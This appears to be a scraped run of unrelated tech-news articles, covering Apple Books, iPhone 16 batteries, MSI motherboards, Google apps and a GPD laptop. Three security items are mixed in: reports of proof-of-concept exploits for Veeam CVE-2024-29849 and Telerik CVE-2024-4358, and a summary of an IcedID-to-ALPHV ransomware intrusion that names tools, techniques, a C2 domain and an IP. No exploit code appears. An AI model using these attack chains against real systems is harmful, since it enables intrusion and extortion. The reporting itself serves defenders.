Apple’s e-book reading app has just become the official audiobook home of one of the most popular book clubs, Reese’s Book Club. Founded by iconic American actress and producer Resse Witherspoon, the book club puts women at the center of stories each month.
The partnership between Apple Books and Reese Witherspoon involves a dedicated page for users to follow to be notified about new monthly picks, which will be featured on Apple’s app.
This dedicated page also allows users to browse books from previous months that were spotlighting women, as well as get access to themed editorial collections curated exclusively by Apple and Reese’s Book Club editors.
But wait, there’s more! Apple announced that its Books app will offer exclusive pricing promotions. On top of that, Hello Sunshine authors, another company founded by Reese Witherspoon that aims to empower women, will curate audiobook recommendations, thus helping readers to choose from more stories that will be revealed only on Apple Books.
Starting this week, Apple Books users can find Reese’s Book Club in the app and learn more about the latest selection, including the newly announced pick for June, which is “The Unwedding,” by number 1 New York Times bestselling author Ally Condie.
This is not the first time that Apple and Reese Witherspoon teamed up for a project. Reese’s Hello Sunshine has already produced the Apple TV+ original series The Last Thing He Told Me, which was renewed for season two, and the Critics Choice Award-winning series “The Morning Show,” among other things.
A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.
The vulnerability, identified as CVE-2024-29849, has a CVSS score of 9.8, indicating its high severity.
This article delves into the details of the vulnerability, the exploit, and the potential implications for organizations using Veeam’s software.
On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.
This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.
The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software.
This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443.
Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN : Start your Analysis
Technical Analysis of the Exploit
The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.
This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.
The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.
The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.
The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.
Diagram illustrating the authentication bypass exploit process.
Proof of Concept (PoC) Code
The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.
The release of this PoC exploit underscores the critical nature of CVE-2024-29849.
Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.
An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.
Veeam has recommended immediate updates to their software’s latest version, including patches to address this vulnerability.
Additionally, organizations should review their security configurations and consider implementing additional layers of security, such as multi-factor authentication (MFA) and network segmentation, to mitigate the risk of exploitation.
The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.
It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.
Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo
Many people complained about the overheating issue of the iPhone 15 series. Apple promised to solve the overheating problem through software updates. However, the issue still persists for many users. The problem could be due to a hardware design of the previous model.
iPhone 16 battery leak shows metal casing & bigger capacity
Now a leak from tipster Majin Bu on X has revealed the battery on the iPhone 16. The image suggests that Apple doesn’t want to make the same mistake with the iPhone 16 series. According to the leak, the battery of the iPhone 16 will equip a metal case outside the soft plastic pouch. The metal casing should help dissipate the heat from the battery. It should be especially helpful when the phone is charging, as this is the scenario where the battery cell heats up the most.
The battery has a similar shape, but the engraving on the metal casing shows “3597mAh”. For context, the iPhone 15 has a smaller 3349 mAh battery.
The leaked images of the iPhone 16 battery show a frosted finish on the case. Apple has also redesigned the connectors. Apple reportedly opted for a glossy surface for the metal casing at first but later on decided to go for a frosted finish.
The use of a hard case for the batteries was first leaked in November by tipster @KosutamiSan. He also claimed that the iPhone 16 series will switch to a graphene thermal system, as it offers excellent thermal conductivity (better than copper).
The latest leak is about the base iPhone 16. However, the tipster @KosutamiSan already shared leaked images of the iPhone 16 Pro battery back in April this year. According to the leak, the battery for the iPhone 16 Pro also has a frosted metal casing and a capacity of 3355mAh. This is around a 2.4% increase as compared to the iPhone 15 Pro.
iPhone 16 could use a different battery technology or it could be heavier
iPhones were becoming heavier and Apple had to find a solution to it. They replaced the stainless steel middle frame of the Pro models with titanium to reduce the weight. As a result, the iPhone 15 Pro became significantly lighter (187g) as compared to its predecessor (206g).
While the iPhone 15 (171g) weighs very similar to its predecessor, the extra metal inside the iPhone 16 may significantly increase the weight. A higher battery capacity will also contribute to the increased weight.
Nonetheless, we can only observe the exterior of the battery pack. Apple might be using a different battery technology with higher energy density, as seen in some book-style foldables.
This is plausible since the metal casing increases the battery’s thickness, which could require a redesign of the internal components or result in a thicker phone.
MSI’s new motherboards are stronger and easier to assemble than ever before
At Computex this week in Taiwan, MSI introduced the X870 motherboards, which perfectly compliment the new AMD Ryzen 9000 lineup of processors. It also includes PCIe Gen 5.0 and M.2 slots, which makes for a great experience in both graphics and storage.
While we don’t yet have pricing or availability for the MSI X870 motherboards, we do know that these will be some of the best motherboards launching this year hence why the MSI X870 Motherboards have earned a Best of Computex 2024 award from Android Headlines.
MSI includes cutting-edge technologies in the new X870 motherboards
As you’d expect from a brand new lineup of motherboards, MSI is supporting the most cutting-edge technologies, including USB 4 connectivity, which will offer speeds of up to 40GB per second. It’s been outfitted with the MAG X870 TOMAHAWK WiFi and PRO X870-P WiFi with cutting-edge 5G LAN, WiFi 7, and Bluetooth 5.4. Basically, it is the latest and greatest tech that will be available in 2024.
When these motherboards become available – likely later this year – it’s definitely going to be the one you want to put in your rig. MSI is also focusing on the ease of assembly with these new motherboards. GPUs getting larger and heavier can be a strain on the motherboard. So MSI is also offering three additional anchor points and using a thicker material for the PCIe slots, which should solve that problem. These are 121% stronger than previous-gen solutions. And the slots are able to withstand twice the weight of the graphics card than before.
Continuing with the ease of assembly theme, MSI has also made it even easier to install an M.2 SSD into your rig with the X870. Just a simple push locks the M.2 SSD into place, and removing it is as simple as a slight pull to the left. It really can’t get any easier than that.
MSI uses cutting-edge technologies and makes installation and upgrades a piece of cake with the X870 motherboards. That’s why we have awarded these new motherboards the Best of Computex 2024 award.
Previously, when you entered text in the compose field but didn’t send it, it would be reflected on the main conversation list. And the thread would be moved up the page, while your text would appear in italics.
Now, with the latest update to Google Messages (version 20240521_00_RC01), also with the beta version (20240531_00_RC00) that preview no longer appears. The thread will still move up the list, but apart from that, you don’t see any indication you have a drafted message in there. It even looks a bit confusing because the last message from the contact shows up with an updated date, instead of showing “Draft” to your message.
It seems like this could be a bug instead of a feature. It doesn’t make the experience better, it can actually generate quite a lot of confusion. Hopefully that will be fixed and is not by design, but it is not clear at the moment if it’s a bug.
Recent features that were removed from Google Messages like reminders or message organization (Personal + Business) indicate this could be another feature removal… but it personally doesn’t make much sense. I’m inclined to say this is indeed a bug, but info on it is scarce at the moment. We have to wait and see what happens!
Izzy, a tech enthusiast and a key part of the PhoneArena team, specializes in delivering the latest mobile tech news and finding the best tech deals. Her interests extend to cybersecurity, phone design innovations, and camera capabilities. Outside her professional life, Izzy, a literature master’s degree holder, enjoys reading, painting, and learning languages. She’s also a personal growth advocate, believing in the power of experience and gratitude. Whether it’s walking her Chihuahua or singing her heart out, Izzy embraces life with passion and curiosity.
Progress patched a critical authentication bypass flaw impacting its Telerik Report Server. The vulnerability appeared after Progress tried to address another vulnerability but an authorization bypass became possible. Users must ensure updating to the latest release to receive the fix.
PoC Shared For Progress Telerik Report Server Flaw
According to a recent post from the security researcher Sina Kheirkhah, Kheirkhah, together with another researcher Soroush Dalili, developed an exploit for a patched vulnerability in Progress Telerik Report Server.
As explained, the vulnerability, now identified as CVE-2024-4358, is basically an authentication bypass in a previously reported flaw CVE-2024-1800.
Regarding CVE-2024-1800, this vulnerability made it to the news when Progress disclosed it as a remote code execution vulnerability. According to the ZDI’s advisory, the issue appeared because of insecure deserialization, and exploiting this vulnerability required authentication.
This flaw received initially received a CVSS score of 8.8, and it affected Telerik Report Server versions prior to 2024 Q1 (10.0.24.130). Progress deployed a patch for it with Report Server 2024 Q1 (10.0.24.305), asking users to upgrade to this or later versions.
However, the two researchers devised a way to bypass this authentication restriction, eventually raising its CVSS to 9.9, and receiving a new identification, CVE-2024-4358.
Specifically, they observed a flaw in the implementation of Register method. Because of a lack of validation for the current installation setup, an unauthenticated adversary could exploit the flaw, receiving “System Administrator” privileges.
Once an adversary gains admin privileges, exploiting the deserialization issue to achieve full RCE becomes trivial.
The researcher has explained the technical details about the vulnerabilities, alongside sharing the PoC exploit, in his post.
Progress Patched The Vulnerability
Following the responsible disclosure from the researchers, Progress patched the vulnerability and shared a detailed advisory to help the users patch their systems.
As elaborated, the vulnerability affected the Report Server version 2024 Q1 (10.0.24.305), which the vendors patch with the release of Report Server 2024 Q2 (10.1.24.514). To avoid potential exploits, users must ensure updating to this, or later Report Server versions.
Nonetheless, where applying an immediate update isn’t possible, Progress recommends implementing URL rewrite technique as temporary mitigation.
In addition, they also advised users to look for any new local accounts in the Report Server users’ list via {host}/Users/Index to ensure no malicious accounts exist.
Google announced a new tool called the Instant Hotspot for Android devices in a Feature Drop last month. The feature lets you instantly connect to another device’s internet connection with just a single click. This becomes possible thanks to the new cross-device services feature that will come to Android soon.
Google has now shared more information about the Android Instant Hotspot feature through the official support page.
How to enable the Instant Hotspot feature in Android?
Instant Hotspot requires the host device (that is sharing the network) and all the devices that will join the network (clients) to be signed into the same Google account. In addition to that, Android’s new cross-device services should also be enabled. The feature is currently not active on any Android device.
After signing into the same Google account and enabling cross-device services you will need to go to Settings > Google > All services > Devices & sharing > Cross-device services on all of the devices. Under the “What your devices can do” heading you will need to select Internet sharing. You’ll also make sure that Internet sharing and Instant hotspots are both enabled here.
Finally, if one of the devices isn’t connected to the internet, and is within the range of another with an internet connection, it will show a pop-up notification. By tapping on the notification you will be able to instantly connect the client to one a host device.
While there is an initial setup process for all your devices, the feature enables seamless connectivity once it’s set up. At present you need to reach the host device and activate the hotspot each time you want to use it.
However, not every device is treated equally
This feature is only available for Android 11 and later versions. In addition to that, Samsung users do not get to experience this feature. “If you have a Samsung device, you can use the Auto Hotspot feature instead,” notes the support page.
Android Go devices won’t support this feature either. For those unfamiliar, it is a lightweight version of the Android operating system designed for low-end and budget smartphones with limited hardware resources.
Two identical displays in a 13-inch laptop form factor.
GPD is a company often mentioned in relation to small laptops. Many of you heard of it thus far, and the company did make an appearance at Computex this year. As part of the show, the company teased its upcoming device. The device in question is GPD DUO, and due to its potential, we’ve decided to send one of our awards GPD’s way. The company did share an image of the device, and some of its details, despite the fact it was not fully revealed during the show. More details are expected to come very soon, though.
The GPD DUO offers two displays in a compact form factor
So, what’s so special about the GPD DUO? Well… its displays. Yes, you read it right, plural. The GPD DUO will come with two displays, which you will be able to utilize in several ways. You’ll be able to stack them one above the other, or one next to the other. If you don’t want to use the second panel at any given time, you simply flip it over all the way and forget it’s there. You can basically use your laptop while you’re playing something else on the second screen for someone, on the other side. If you need more screen real estate, that’s not a problem, simply stack them one on top of the other.
The Microsoft Surface Pen stylus is compatible with this laptop
That’s not all, though. There’s one more use case… a tablet use case. You can close the lid on the GPD DUO, and still have one display available on the outside, in case you’d like to use it in a tablet form. Yes, this is a touchscreen, and it supports a 10-point touch input. On top of that, it’s compatible with the Surface Pen stylus and supports 4,096 levels of pressure sensitivity with that stylus (the MPP protocol). This laptop can be used for design purposes this way, without a problem.
Two 13.3-inch Samsung-made OLED displays are used
The size could be the key here. The GPD DUO features two 13.3-inch OLED displays. When folded, it’s the size of an A4 sheet of paper, says GPD. It’s, of course, a lot thicker, but its height and width are very manageable. The fact it can unfold into a dual-screen setup could come in handy for many people. A 13-inch laptop size is still preferred by many, but you’re getting the best of both worlds here. Not only are you getting a manageable laptop in terms of size, but two displays on it too. GPD is using Samsung’s AMOLED panels here, by the way.
There’s a lot of potential in this laptop and its form factor, and GPD has plenty of experience in the field. We’re all waiting for more information about the GPD DUO.
Google’s library of defunct apps and services is getting bigger each year. The search giant revealed at the beginning of 2024 that it will shut down the GPay app in the United States.
That means that starting June 4, GPay is no longer available in the United States. If you’re trying login, you’ll be met with a message that informs you about the changes: “The Google Pay US app is no longer available. You can still tap to pay using the Google Wallet.”
The message is also meant to provide GPay users with an alternative in case they didn’t know already. Google Wallet is now the company’s main mobile payment app, at least until the company changes its mind and decides to discontinue the app and/or the payment system.
Beside GPay no longer working in the United States, Google also removed peer-to-peer payments. As per 9to5google’s report, users can still use the Google Pay website to view and transfer their balance to a bank account after June.
The changes made by Google this month will mostly affect those with multiple accounts who used GPay for its peer-to-peer functionality. The rest will probably don’t feel its absence that much since they can just switch to Google Wallet (if they didn’t already).
Ransomware is used by hackers to abuse victims’ data, locking it until a ransom is paid.
This method of cyber attack is profitable as it takes advantage of data’s proximity and vitality to individuals and companies, so they have no choice but to pay for quick returns.
An invasion started with an email containing a forked IcedID variant that emphasized payload delivery.
After gaining initial access, the intruder installed ScreenConnect on the computer for remote control, abusively utilized Cobalt Strike beacons, and deployed CSharp Streamer RAT to gain credentials and move laterally within domain controllers and servers.
During the identification phase, sensitive information was placed in ‘confucius_cpp,’ a special program of which rclone showed the extraction.
With ANYRUN You can Analyze any URL, Files & Email for Malicious Activity : Start your Analysis
For eight days, they performed a systematic deployment of ScreenConnect installers across hosts using WMI before finally delivering ALPHV ransomware payloads after deleting backups.
ALPHV Ransomware Deployment
The malicious spam electronic mail, which tricked the prey into downloading and unzipping a folder with a readme and Visual Basic Script (VBS), served as the initial access vector.
Activating VBS executed an embedded, obfuscated IcedID loader DLL that dropped and ran another IcedID DLL payload, completing the infection chain, reads the DFIR report.
This is consistent with a known malicious activity where the same technique was employed to distribute an IcedID fork that deals with payload deployment instead of banking activities.
The threat actor deployed ScreenConnect remote access tools using disguised installation programs that operated through wmiexec and RDP sessions.
Several techniques were employed to extract Cobalt Strike beacons, including bitsadmin, certutil, and PowerShell.
CSharp Streamer RAT kept persistence via scheduled tasks in LSASS credential dumping, lateral movement, and C2 communications.
IcedID ensured its persistence by using scheduled tasks, while ScreenConnect was made persistent across reboots.
During lateral movement into winlogon.exe and rundll32.exe, process injection was observed. Renamed installers were deleted by the actor.
Lateral movement (Source – The Fire Report)
Key activities involved LSASS credential dumping, which was validated through memory analysis, and dcsync was performed from the beachhead to a domain controller for credential harvesting.
This was followed by the threat actor conducting initial recognition using native Windows utilities launched through IcedID and subsequently exploiting ScreenConnect for more reconnaissance commands.
SoftPerfect netscan for network scanning took place on different days, targeting IP ranges plus ports of RPC, SMB, RDP, and Veeam backups.
ScreenConnect installers were then laterally copied via SMB and became deployed with wmiexec.py to get remote control. The attacker extensively used RDP for lateral movement including proxying through CSharp Streamer.
Before exfiltration, a custom tool called confucius_cpp enumerated systems by LDAP query, accessed shares based on keywords, and compressed sensitive information. The attacker also opened documents using the Firefox installation.
C&C (Source – The Fire Report)
The threat actor leveraged multiple tools during the intrusion:-
IcedID for initial access communicating with modalefastnow[.]com
Cobalt Strike beacons across hosts connecting to tracked C2 infrastructure
CSharp Streamer RAT at 109.236.80.191 using WebSockets over rotating ports
ScreenConnect remote access tools deployed via renamed binaries executed through wmiexec.py
While Firefox was used for document preview and downloading rclone, which was executed through a VBS script for data exfiltration.
The final payload was ALPHV ransomware, staged on the backup server then deployed across hosts via xcopy and WMI-initiated execution after deleting backups.
Note (Source – The Fire Report)
A ransom note referencing the group’s Twitter was left post-encryption.
Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo
.webp)
.webp)
.webp)